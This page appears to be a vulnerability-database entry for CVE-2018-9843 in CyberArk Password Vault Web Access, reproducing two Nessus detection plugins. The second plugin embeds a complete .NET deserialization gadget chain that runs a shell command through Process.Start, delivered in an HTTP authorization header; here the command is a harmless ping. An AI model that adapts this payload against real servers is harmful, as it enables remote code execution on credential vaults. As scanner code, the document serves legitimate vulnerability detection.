Vulnerabilities > CVE-2018-9843 - Deserialization of Untrusted Data vulnerability in Cyberark Password Vault 10.0

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(108952);
  script_version("1.10");
  script_cvs_date("Date: 2019/10/07 15:15:27");

  script_cve_id("CVE-2018-9843");
  script_bugtraq_id(105180);
  script_xref(name:"IAVB", value:"2018-B-0121");

  script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization");
  script_summary(english:"Looks for the product and version in the logon page.");

  script_set_attribute(attribute:"synopsis", value:
"An Identity Management application running on the remote host is affected by
a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of CyberArk Password Vault Web Access running on the
remote host is prior to 9.9.5, 9.10.x prior to 9.10.1, or is version
10.1. It is, therefore, vulnerable to a remote code execution
vulnerability.

Note that Nessus has not tested for this issue but has instead relied
only on the application's self-reported version number.
");
  # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
  script_set_attribute(attribute:"solution", value:
"Upgrade to CyberArk Password Vault 9.9.5, 9.10.1, 10.2 or Later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/10");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("cyberark_password_vault_detection.nbin");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("vcf.inc");
include("vcf_extras.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80);
app = vcf::get_app_info(app:"CyberArk Password Vault Web Access", webapp:TRUE, port:port);

constraints = 
[
  {"min_version" : "0.0.0", "fixed_version" : "9.9.5"},
  {"min_version" : "9.10.0", "fixed_version" : "9.10.1"},
  {"min_version" : "10.1",  "fixed_version" : "10.2"}
];

vcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(110287);
  script_version("1.5");
  script_cvs_date("Date: 2019/10/07 15:15:27");

  script_cve_id("CVE-2018-9843");
  script_bugtraq_id(105180);

  script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)");
  script_summary(english:"Sends a .NET object to trigger an error message.");

  script_set_attribute(attribute:"synopsis", value:
"An Identity Management application running on the remote host is affected by
a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The CyberArk Password Vault Web Access running on the remote host is
affected by a remote code execution vulnerability due to unsafe
deserialization of an .NET object. An unauthenticated, remote
attacker can exploit this, via a crafted a .NET object, to execute
arbitrary .NET code in the context of the IIS server.");

  # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
  script_set_attribute(attribute:"solution", value:
"Upgrade to CyberArk Password Vault Web Access 9.9.5, 9.10.1, 10.2 or Later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/01");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("cyberark_password_vault_detection.nbin");
  script_require_keys("installed_sw/CyberArk Password Vault Web Access");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app   = 'CyberArk Password Vault Web Access';

# Plugin will exit if app is not detected on host
get_install_count(app_name:app, exit_if_zero:TRUE);

# Plugin will exit if app is not detected on this port
port = get_http_port(default:80);
install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:FALSE);

url = "/PasswordVault/WebServices/PIMServices.svc/Applications/?Location=\&IncludeSublocations=true";

cmd = 'ping -n 3 localhost';

# vuln verification 
#cmd = 'dir > c:\\Windows\\Temp\\hacked.txt';

cmd = '/c ' + cmd;

obj = raw_string(
0x00,0x01,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x0C,0x02,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
0x05,0x01,0x00,0x00,0x00,0x84,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,
0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,
0x63,0x2E,0x53,0x6F,0x72,0x74,0x65,0x64,0x53,0x65,0x74,0x60,0x31,0x5B,0x5B,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x04,0x00,0x00,0x00,0x05,
0x43,0x6F,0x75,0x6E,0x74,0x08,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x07,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x05,0x49,0x74,0x65,0x6D,0x73,0x00,0x03,0x00,0x06,
0x08,0x8D,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,
0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,
0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,
0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,
0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,
0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,
0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,
0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,
0x08,0x02,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x09,0x03,0x00,0x00,0x00,0x02,0x00,
0x00,0x00,0x09,0x04,0x00,0x00,0x00,0x04,0x03,0x00,0x00,0x00,0x8D,0x01,0x53,0x79,
0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,
0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x69,
0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x60,0x31,0x5B,0x5B,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x01,0x00,0x00,0x00,0x0B,
0x5F,0x63,0x6F,0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x03,0x22,0x53,0x79,0x73,
0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,
0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,
0x05,0x00,0x00,0x00,0x11,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x06,0x06,0x00,
0x00) +
mkword(strlen(cmd)) + cmd +
raw_string(
0x06,0x07,0x00,0x00,0x00,0x03,0x63,0x6D,
0x64,0x04,0x05,0x00,0x00,0x00,0x22,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,
0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x03,0x00,0x00,0x00,0x08,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x07,0x6D,0x65,0x74,0x68,0x6F,0x64,0x30,0x07,0x6D,
0x65,0x74,0x68,0x6F,0x64,0x31,0x03,0x03,0x03,0x30,0x53,0x79,0x73,0x74,0x65,0x6D,
0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,
0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,0x6C,
0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x2F,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2F,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,0x08,0x00,0x00,0x00,0x09,
0x09,0x00,0x00,0x00,0x09,0x0A,0x00,0x00,0x00,0x04,0x08,0x00,0x00,0x00,0x30,0x53,
0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,
0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,
0x72,0x2B,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x07,
0x00,0x00,0x00,0x04,0x74,0x79,0x70,0x65,0x08,0x61,0x73,0x73,0x65,0x6D,0x62,0x6C,
0x79,0x06,0x74,0x61,0x72,0x67,0x65,0x74,0x12,0x74,0x61,0x72,0x67,0x65,0x74,0x54,
0x79,0x70,0x65,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x0E,0x74,0x61,0x72,0x67,
0x65,0x74,0x54,0x79,0x70,0x65,0x4E,0x61,0x6D,0x65,0x0A,0x6D,0x65,0x74,0x68,0x6F,
0x64,0x4E,0x61,0x6D,0x65,0x0D,0x64,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,
0x74,0x72,0x79,0x01,0x01,0x02,0x01,0x01,0x01,0x03,0x30,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,
0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,
0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x06,0x0B,0x00,0x00,0x00,
0xB0,0x02,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x46,0x75,0x6E,0x63,0x60,0x33,0x5B,
0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,
0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,
0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,
0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,
0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,
0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,
0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,
0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,
0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,
0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,
0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,
0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,
0x6F,0x63,0x65,0x73,0x73,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
0x5D,0x5D,0x06,0x0C,0x00,0x00,0x00,0x4B,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,
0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
0x30,0x38,0x39,0x0A,0x06,0x0D,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,
0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
0x30,0x38,0x39,0x06,0x0E,0x00,0x00,0x00,0x1A,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,
0x65,0x73,0x73,0x06,0x0F,0x00,0x00,0x00,0x05,0x53,0x74,0x61,0x72,0x74,0x09,0x10,
0x00,0x00,0x00,0x04,0x09,0x00,0x00,0x00,0x2F,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,0x62,0x65,
0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,
0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x07,0x00,0x00,0x00,0x04,0x4E,0x61,0x6D,
0x65,0x0C,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x4E,0x61,0x6D,0x65,0x09,0x43,
0x6C,0x61,0x73,0x73,0x4E,0x61,0x6D,0x65,0x09,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,
0x72,0x65,0x0A,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x32,0x0A,0x4D,0x65,
0x6D,0x62,0x65,0x72,0x54,0x79,0x70,0x65,0x10,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,
0x41,0x72,0x67,0x75,0x6D,0x65,0x6E,0x74,0x73,0x01,0x01,0x01,0x01,0x01,0x00,0x03,
0x08,0x0D,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x54,0x79,0x70,0x65,0x5B,0x5D,0x09,
0x0F,0x00,0x00,0x00,0x09,0x0D,0x00,0x00,0x00,0x09,0x0E,0x00,0x00,0x00,0x06,0x14,
0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,
0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x53,
0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x29,0x06,0x15,0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,
0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,
0x73,0x73,0x20,0x53,0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,
0x74,0x72,0x69,0x6E,0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x0A,0x00,0x00,0x00,
0x09,0x00,0x00,0x00,0x06,0x16,0x00,0x00,0x00,0x07,0x43,0x6F,0x6D,0x70,0x61,0x72,
0x65,0x09,0x0C,0x00,0x00,0x00,0x06,0x18,0x00,0x00,0x00,0x0D,0x53,0x79,0x73,0x74,
0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x06,0x19,0x00,0x00,0x00,0x2B,0x49,
0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,
0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,
0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x29,0x06,0x1A,0x00,0x00,0x00,0x32,
0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x49,0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,
0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x10,0x00,0x00,0x00,0x08,0x00,0x00,0x00,
0x06,0x1B,0x00,0x00,0x00,0x71,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6D,
0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,
0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,
0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,
0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,
0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,
0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,
0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x09,0x0C,0x00,0x00,0x00,0x0A,0x09,0x0C,0x00,
0x00,0x00,0x09,0x18,0x00,0x00,0x00,0x09,0x16,0x00,0x00,0x00,0x0A,0x0B
); 

# PVWA can be slow to respond
http_set_read_timeout(30);

token = base64(str: obj);
res = http_send_recv3(
        port        : port, 
        method      : 'GET',
        item        : url,
        add_headers : make_array('authorization', token),
        content_type: 'application/json',
        fetch404    : TRUE,
        exit_on_fail: TRUE
      );

if(isnull(res[2]))
  audit(AUDIT_RESP_NOT, port, 'a GET request: No data in the response body');

# 
# Patched:
# 403 
# {"ErrorCode":"CAWS00001E","ErrorMessage":"Connection to the Vault was terminated."}
if (res[2] !~ "Unable to cast object of type.* to type 'CyberArk.Services.Web.SessionIdentifiers")
{
  audit(AUDIT_INST_VER_NOT_VULN, app, install['version']);
}

#
# Vulenrable:
# 403
# {"ErrorCode":"CAWS00001E","ErrorMessage":"Error raised while trying to establish session using session token provided. Error: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'CyberArk.Services.Web.SessionIdentifiers'."}
#
report =
  '\nNessus was able to detect the .NET deserialization vulnerability by' +
  '\nsending a crafted .NET object.' +
  '\n';
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);